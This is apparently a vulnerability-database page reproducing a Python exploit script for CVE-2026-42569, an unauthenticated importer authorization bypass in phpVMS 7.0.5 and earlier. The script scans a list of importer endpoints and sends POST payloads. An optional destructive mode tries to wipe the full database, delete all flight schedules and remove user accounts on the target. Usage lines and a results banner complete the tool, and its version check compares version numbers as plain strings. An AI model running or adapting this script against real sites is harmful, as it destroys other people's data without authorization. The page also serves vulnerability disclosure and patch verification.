Vulners
Lucene search
📄 phpVMS 7.0.5 Unauthenticated Import Endpoint Bypass
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2026-42569 | 9 May 202619:21 | – | attackerkb |
 | CVE-2026-42569 | 9 May 202621:00 | – | circl |
 | phpVMS 8 访问控制错误漏洞 | 9 May 202600:00 | – | cnnvd |
 | CVE-2026-42569 | 9 May 202619:21 | – | cve |
 | CVE-2026-42569 phpvms: /importer authorization bypass causing full database wipe | 9 May 202619:21 | – | cvelist |
 | EUVD-2026-28930 | 9 May 202619:21 | – | euvd |
 | phpVMS has an /importer authorization bypass causing full database wipe | 4 May 202621:20 | – | github |
 | phpVMS < 7.0.6 - Legacy Importer Authorization Bypass | 10 Jun 202605:11 | – | nuclei |
 | CVE-2026-42569 | 9 May 202620:16 | – | nvd |
 | GHSA-FV26-4939-62FH phpVMS has an /importer authorization bypass causing full database wipe | 4 May 202621:20 | – | osv |
10
==================================================================================================================================
| # Title : phpVMS ≤ 7.0.5 Unauthenticated Import Endpoint Bypass |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://phpvms.net/ |
==================================================================================================================================
[+] Summary : This script is an active vulnerability testing and exploitation tool targeting phpVMS ≤ 7.0.5.
It scans multiple importer-related endpoints, attempts POST-based actions that simulate or trigger destructive
operations (such as import, delete, and database wipe behaviors), and classifies a target as vulnerable based on HTTP responses and keyword indicators.
[+] POC :
#!/usr/bin/env python3
"""
Affected: phpVMS ≤ 7.0.5
Patched: phpVMS 7.0.6+
"""
import requests
import sys
import time
import argparse
from urllib.parse import urljoin
try:
from colorama import init, Fore, Style
init(autoreset=True)
COLORS = True
except ImportError:
COLORS = False
class Fore:
RED = GREEN = YELLOW = CYAN = ''
class Style:
RESET_ALL = ''
def colorize(text, color):
if COLORS:
return f"{color}{text}{Style.RESET_ALL}"
return text
def banner():
banner_text = """
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-42569 - phpVMS RCE/Destructive ║
║ Unauthenticated Legacy Importer Access ║
║ By indoushka ║
╚══════════════════════════════════════════════════════════════╝
"""
print(colorize(banner_text, Fore.RED))
def test_endpoint(target, endpoint, timeout=10, verify_ssl=False):
"""Test a single endpoint for vulnerability"""
url = urljoin(target.rstrip('/') + '/', endpoint.lstrip('/'))
print(colorize(f"[*] Testing: {url}", Fore.YELLOW))
headers = {
"User-Agent": "Mozilla/5.0 (CVE-2026-42569 Scanner)",
"Content-Type": "application/x-www-form-urlencoded"
}
test_payloads = [
{
"name": "basic_access",
"data": {},
"method": "GET"
},
{
"name": "import_trigger",
"data": {
"action": "import",
"type": "full",
"confirm": "true"
},
"method": "POST"
},
{
"name": "delete_trigger",
"data": {
"action": "delete_all",
"confirm": "yes"
},
"method": "POST"
},
{
"name": "truncate_schedules",
"data": {
"action": "clear_schedules",
"_token": "bypass"
},
"method": "POST"
}
]
vulnerable = False
results = []
for payload in test_payloads:
try:
if payload["method"] == "GET":
r = requests.get(url, headers=headers, timeout=timeout,
verify=verify_ssl, allow_redirects=True)
else:
r = requests.post(url, headers=headers, data=payload["data"],
timeout=timeout, verify=verify_ssl,
allow_redirects=True)
indicators = [
"success" in r.text.lower(),
"imported" in r.text.lower(),
"deleted" in r.text.lower(),
"truncat" in r.text.lower(),
"completed" in r.text.lower(),
"database" in r.text.lower() and ("clear" in r.text.lower() or "wipe" in r.text.lower())
]
if r.status_code in [200, 301, 302, 307, 308]:
if any(indicators) or len(r.text) > 200:
vulnerable = True
results.append({
"payload": payload["name"],
"status": r.status_code,
"indicators": [ind for ind in indicators if ind][:3]
})
elif r.status_code == 403:
print(colorize(f" [!] Endpoint exists but returned 403 (may still be vulnerable in older versions)", Fore.YELLOW))
except requests.exceptions.ConnectionError:
print(colorize(f" [-] Connection error - target may be down", Fore.RED))
except requests.exceptions.Timeout:
print(colorize(f" [-] Timeout on {url}", Fore.RED))
except Exception as e:
print(colorize(f" [-] Error: {str(e)[:50]}", Fore.RED))
return vulnerable, results
def attempt_exploit(target, endpoint, destructive=False, timeout=10):
"""Attempt to exploit the vulnerability with destructive actions"""
if destructive:
print(colorize("\n[!!!] DESTRUCTIVE MODE ENABLED - THIS WILL DAMAGE DATA [!!!]", Fore.RED))
confirm = input(colorize("Type 'CONFIRM_DESTROY' to continue: ", Fore.RED))
if confirm != "CONFIRM_DESTROY":
print(colorize("[*] Destructive operation cancelled.", Fore.YELLOW))
return False
url = urljoin(target.rstrip('/') + '/', endpoint.lstrip('/'))
dangerous_payloads = [
{
"name": "FULL_DATABASE_WIPE",
"data": {
"action": "full_import",
"wipe_first": "true",
"confirm": "yes",
"force": "1"
},
"description": "Attempts to wipe entire database"
},
{
"name": "DELETE_ALL_FLIGHTS",
"data": {
"action": "import_schedules",
"clear_existing": "on",
"submit": "Import"
},
"description": "Deletes all flight schedules"
},
{
"name": "TRUNCATE_USERS",
"data": {
"action": "import_users",
"replace": "all",
"_method": "DELETE"
},
"description": "Removes user accounts"
}
]
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest"
}
success_count = 0
for payload in dangerous_payloads:
print(colorize(f"\n[*] Attempting: {payload['name']}", Fore.MAGENTA))
print(colorize(f" Description: {payload['description']}", Fore.CYAN))
try:
r = requests.post(url, headers=headers, data=payload["data"],
timeout=timeout, verify=False, allow_redirects=True)
if r.status_code in [200, 302]:
print(colorize(f" [+] Payload delivered - Check target for damage", Fore.RED))
success_count += 1
else:
print(colorize(f" [-] Failed with status: {r.status_code}", Fore.YELLOW))
except Exception as e:
print(colorize(f" [-] Error: {str(e)[:50]}", Fore.RED))
return success_count > 0
def scan_common_endpoints(target):
"""Scan common vulnerable endpoint patterns"""
endpoints = [
"/importer",
"/importer/index",
"/importer/index.php",
"/import",
"/import/index",
"/legacy/importer",
"/admin/importer",
"/install/importer",
"/public/importer",
"/index.php/importer",
"/index.php/import",
"/?module=importer",
"/index.php?module=import",
"/legacy/import",
"/tools/importer",
"/maintenance/import",
]
vulnerable_endpoints = []
for endpoint in endpoints:
vulnerable, results = test_endpoint(target, endpoint)
if vulnerable:
vulnerable_endpoints.append({
"endpoint": endpoint,
"results": results
})
print(colorize(f"\n[+] VULNERABLE: {endpoint}", Fore.GREEN))
for result in results:
print(colorize(f" - Payload '{result['payload']}' triggered (Status: {result['status']})", Fore.GREEN))
else:
print(colorize(f"[-] Not vulnerable: {endpoint}", Fore.RED))
return vulnerable_endpoints
def check_version(target):
"""Try to detect phpVMS version from response headers or content"""
version_indicators = [
"/admin/settings",
"/VERSION",
"phpVMS",
"phpvms"
]
print(colorize("\n[*] Attempting version detection...", Fore.CYAN))
try:
r = requests.get(target, timeout=10, verify=False)
if "phpVMS" in r.text:
import re
version_match = re.search(r'phpVMS[^\d]*(\d+\.\d+\.\d+)', r.text, re.I)
if version_match:
version = version_match.group(1)
print(colorize(f"[+] Detected phpVMS version: {version}", Fore.CYAN))
if version <= "7.0.5":
print(colorize(f"[!] Version {version} is VULNERABLE!", Fore.RED))
else:
print(colorize(f"[*] Version {version} appears patched", Fore.GREEN))
return version
if 'X-Powered-By' in r.headers:
if 'phpVMS' in r.headers['X-Powered-By']:
print(colorize(f"[+] Header reveals phpVMS installation", Fore.CYAN))
except Exception as e:
print(colorize(f"[-] Version detection failed: {e}", Fore.YELLOW))
return None
def exploit(target, destructive=False, scan_all=False):
print(colorize(f"[*] Targeting: {target}", Fore.CYAN))
version = check_version(target)
if version and version > "7.0.5":
print(colorize(f"[!] Target appears patched. Proceeding with caution...", Fore.YELLOW))
if scan_all:
print(colorize("\n[*] Running full endpoint scan...", Fore.CYAN))
vulnerable_endpoints = scan_common_endpoints(target)
else:
print(colorize("\n[*] Testing common endpoints...", Fore.CYAN))
endpoints = ["/importer", "/import", "/legacy/importer"]
vulnerable_endpoints = []
for endpoint in endpoints:
vulnerable, results = test_endpoint(target, endpoint)
if vulnerable:
vulnerable_endpoints.append({"endpoint": endpoint, "results": results})
if vulnerable_endpoints:
print(colorize("\n" + "="*60, Fore.RED))
print(colorize("[!!!] SYSTEM IS VULNERABLE TO CVE-2026-42569 [!!!]", Fore.RED))
print(colorize("="*60, Fore.RED))
for vuln in vulnerable_endpoints:
print(colorize(f"\n[+] Vulnerable endpoint: {vuln['endpoint']}", Fore.RED))
for result in vuln['results']:
print(colorize(f" - {result['payload']} payload succeeded", Fore.YELLOW))
print(colorize("\n" + "="*60, Fore.RED))
print(colorize("IMPACT: Unauthenticated database wipe/delete possible", Fore.RED))
print(colorize("="*60, Fore.RED))
if destructive and vulnerable_endpoints:
print(colorize("\n[*] Preparing exploitation sequence...", Fore.MAGENTA))
for vuln in vulnerable_endpoints:
print(colorize(f"\n[*] Exploiting: {vuln['endpoint']}", Fore.MAGENTA))
attempt_exploit(target, vuln['endpoint'], destructive=True)
else:
print(colorize("\n[*] No vulnerable endpoints detected", Fore.GREEN))
print(colorize("[*] Target may be patched or configured securely", Fore.GREEN))
def main():
banner()
parser = argparse.ArgumentParser(
description='CVE-2026-42569 - phpVMS Unauthenticated Import Endpoint Bypass',
epilog='Example: python3 CVE-2026-42569.py http://target.com --destructive'
)
parser.add_argument('target', help='Target URL (e.g., http://target.com)')
parser.add_argument('--destructive', '-d', action='store_true',
help='Enable destructive exploitation (WILL DAMAGE DATA)')
parser.add_argument('--scan-all', '-s', action='store_true',
help='Scan all common endpoint variations')
parser.add_argument('--timeout', '-t', type=int, default=10,
help='Request timeout in seconds (default: 10)')
args = parser.parse_args()
if not args.target.startswith(('http://', 'https://')):
args.target = 'http://' + args.target
try:
exploit(args.target, args.destructive, args.scan_all)
except KeyboardInterrupt:
print(colorize("\n[*] Scan interrupted by user", Fore.YELLOW))
sys.exit(0)
print(colorize("\n" + "="*60, Fore.RED))
print(colorize("REMINDER: This vulnerability can cause COMPLETE DATABASE DELETION", Fore.RED))
print(colorize("Use responsibly and only on authorized targets.", Fore.RED))
print(colorize("="*60, Fore.RED))
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python3 CVE-2026-42569.py <target> [options]")
print("\nBasic scan:")
print(" python3 CVE-2026-42569.py http://phpvms.example.com")
print("\nFull scan:")
print(" python3 CVE-2026-42569.py http://phpvms.example.com --scan-all")
print("\nDestructive mode (WILL DAMAGE DATA):")
print(" python3 CVE-2026-42569.py http://phpvms.example.com --destructive")
print("\nOptions:")
print(" --destructive, -d Enable destructive exploitation")
print(" --scan-all, -s Scan all endpoint variations")
print(" --timeout, -t Request timeout in seconds")
sys.exit(1)
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Jun 2026 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.19.4
EPSS0.02105
SSVC